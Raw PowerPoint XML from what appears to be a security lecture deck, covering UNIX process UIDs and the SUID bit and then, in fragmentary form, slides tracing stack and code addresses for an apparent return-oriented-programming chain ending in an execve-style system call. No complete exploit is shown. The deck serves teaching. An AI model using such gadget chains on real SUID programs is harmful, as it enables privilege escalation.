            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understanding UNIX Processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each process has a real UID/GID, an effective UID/GID, and a saved UID/GID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real IDs: defines the user who started/owns the process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Effective IDs: used to determine if the process is "allowed to do things"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved IDs: used to drop and re-gain privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a program file has the SUID bit set, when a process executes the program the process’ effective UID/GID are changed to the ones of the program file owner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>rwsr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-x. 1 root root 30768 Feb 22  2012 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>rws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>--x--x. 1 root root 20056 Oct 15  2014 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7318363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0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0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0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605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605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6051">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60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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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400</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1980647555"/>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0xbffff65c</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1746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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="209080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473201723"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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401</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353298628"/>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0xbffff660</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0x0806e91b</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42271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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1727012"/>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509233648"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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402</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="780319326"/>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0xbffff664</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182833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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="136305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388103223"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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403</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263512391"/>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0xbffff664</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0x080541b2</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209080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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="136305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2112659302"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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404</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1847011346"/>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0xbffff668</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0x0807b406</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341642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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="96976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741475423"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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405</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1080075340"/>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0x1</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0xbffff668</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0x0807b407</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368569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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="96976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843574837"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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0x0807b406</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0x080e4bd1</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0x080481c9</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406</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ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1676609030"/>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0xb</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0xbffff690</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0x0807b407</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368569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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="63023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46971289"/>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0xbffff690</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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0xbffff62c</a:t>
            </a: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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</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5461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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0807b406</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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080e4bd1</a:t>
                      </a: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54613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080481c9</a:t>
                      </a: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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080541b0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10011"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080ea070</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10012"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0806e91a</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10013"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x0809a67d</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10014"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="354613">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080bb6d6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>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407</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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="768996404"/>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0xb</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r>
                        <a:rPr lang="is-IS">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0xbffff694</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0x080493e1</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xor</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ecx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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>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0x80</a:t>
            </a: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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x806e91b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="hu-HU" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80bb6d6</a:t>
            </a:r>
            <a:endParaRPr lang="is-IS" sz="1800" dirty="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p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x809a67f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80541b0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80541b2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80481c9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80481ca</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80e4bd1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80e4bd2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x807b406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x807b407</a:t>
            </a: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399049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Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="26521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831203849"/>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CFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>408</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644864310"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5893197" y="226143"/>
          <a:ext cx="3696160" cy="25603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0xb</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0x080ea060</a:t>
                      </a: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0x080ea06c</a:t>
                      </a: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0x080ea068</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0xbffff694</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>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0x65646362</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="306256">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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x080493e1</a:t>
                      </a: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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
